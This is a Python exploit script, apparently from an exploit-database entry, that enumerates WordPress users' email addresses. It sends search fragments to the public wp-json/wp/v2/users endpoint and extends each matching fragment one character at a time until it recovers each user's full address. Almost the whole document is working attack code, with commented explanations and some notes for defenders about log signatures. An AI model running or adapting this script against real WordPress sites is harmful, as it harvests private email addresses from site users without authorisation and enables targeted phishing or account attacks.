## https://sploitus.com/exploit?id=WPEX-ID:19380917-4C27-4095-ABF1-EBA6F913B441
from multiprocessing import Pool
import requests
import string
import json
import sys


# Exactly one positional argument is accepted: the root URL of the WordPress
# site under test. Any other argument count prints usage and exits with
# status 0 (bare sys.exit()).
if len(sys.argv) != 2:
 print(f'USAGE: {sys.argv[0]} <target site root url>')
 sys.exit()

# Endpoint hit by every probe: the public REST users collection. A trailing
# slash on the supplied root is dropped so the path separator is not doubled.
url = '/'.join((sys.argv[1].rstrip('/'), 'wp-json/wp/v2/users'))

# slug -> longest email fragment confirmed so far; filled in under __main__.
known_users = {}
# Declared here but never read anywhere in this script.
user_suffixes = []
# Every probe starts from the '@' that separates local part and domain.
current_suffix = '@'
# Static headers sent with each probe. The fixed, dated User-Agent string is
# a convenient pivot for defenders correlating these requests in access logs.
headers = {
 'Content-Type': 'application/json',
 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136',
}

def bruteforce_search(txt):
 """Probe the users endpoint with one ``search`` fragment.

 The fragment is sent as the JSON body of a GET request to the module-level
 ``url`` with the module-level ``headers``. Returns ``(txt, parsed)`` where
 ``parsed`` is the response body decoded with ``json.loads``; a non-JSON
 body therefore raises ``json.JSONDecodeError``. Nothing is written to
 module state, which is what lets ``Pool.imap`` run it in worker processes.
 """
 body = json.dumps({'search': txt})
 response = requests.get(url, headers=headers, data=body)
 parsed = json.loads(response.text)
 return (txt, parsed)



if __name__ == '__main__':
 # String comparisons in the DB are case-insensitive, so don't bother with uppercase letters
 # Candidate alphabet, one character per probe. The tail of the literal is a
 # pasted regex character class, so ']' and '+' are candidates too, and because
 # '\/' and '\.' are not valid Python escapes the backslash is kept (with a
 # warning), so the alphabet also contains literal backslashes.
 dic = string.ascii_lowercase + string.digits + '!#$&\'+\/=?^_`{|}~\.-]+'
 # 16 worker processes issue probes concurrently. The pool is never closed or
 # joined, so it is only torn down at interpreter exit.
 p = Pool(16)

 # Baseline request without a search body. The result is overwritten by the
 # loop variable below and never inspected; its only effect is one extra
 # request in the target's logs.
 users = json.loads(requests.get(url).text)

 # Initial round: Grab all users by their first email domain's character
 # Each probe is '@' plus one candidate. A user appearing in the response is
 # treated as the server having matched the fragment against the stored email
 # (the script's premise; see the final print). For defenders, a burst of
 # requests to /wp-json/wp/v2/users carrying a JSON 'search' body from one
 # client is the observable signature of this technique.
 suffixes = [current_suffix + c for c in dic]

 # Pool.imap yields results in input order, so if a user matches several
 # fragments the last one in alphabet order is the one kept.
 for suffix, users in p.imap(bruteforce_search, suffixes):
  if len(users) > 0:
   print(users)
   for user in users:
    slug = user['slug']
    print(f'# Added user: {slug}, suffix: {suffix}')
    known_users[user['slug']] = suffix

 # Iterate through all users
 # Phase 1: grow each user's fragment to the right one character per round,
 # until no candidate keeps that user in the result set. Only values of
 # known_users change during the key iteration, so the dict is not resized.
 for user in known_users:
  print(f'# Bruteforcing email domain for {user}..')
  foundSomething = True
  while foundSomething:
   foundSomething = False
   # Candidates are built before any probe of this round runs, so updates to
   # known_users[user] inside the round do not alter the current candidates.
   suffixes = [known_users[user] + c for c in dic]
   for suffix, users_found in p.imap(bruteforce_search, suffixes):
    for user_found in users_found:
     if user_found['slug'] == user:
      print(suffix)
      # 'break' leaves only the inner loop; a later candidate in the same
      # round can overwrite this, so the last matching fragment wins.
      known_users[user] = suffix
      foundSomething = True
      break

 # Phase 2: same procedure, but candidates are prepended, growing the part
 # left of the '@'. Termination again relies on a round with no match.
 for user in known_users:
  print(f'# Bruteforcing email ID for {user}..')
  foundSomething = True
  while foundSomething:
   foundSomething = False
   suffixes = [c + known_users[user] for c in dic]
   for suffix, users_found in p.imap(bruteforce_search, suffixes):
    for user_found in users_found:
     if user_found['slug'] == user:
      print(suffix)
      # As above: inner-loop break only, last match in the round is kept.
      known_users[user] = suffix
      foundSomething = True
      break

 # Report: slug and the longest fragment the oracle confirmed for it. Sites
 # that do not expose a search oracle on this endpoint (patched core, or
 # unauthenticated access to the endpoint restricted) simply never populate
 # known_users beyond the initial round.
 print('# Found the following:')
 for user in known_users:
  email = known_users[user]
  print(f'{user} => {email}')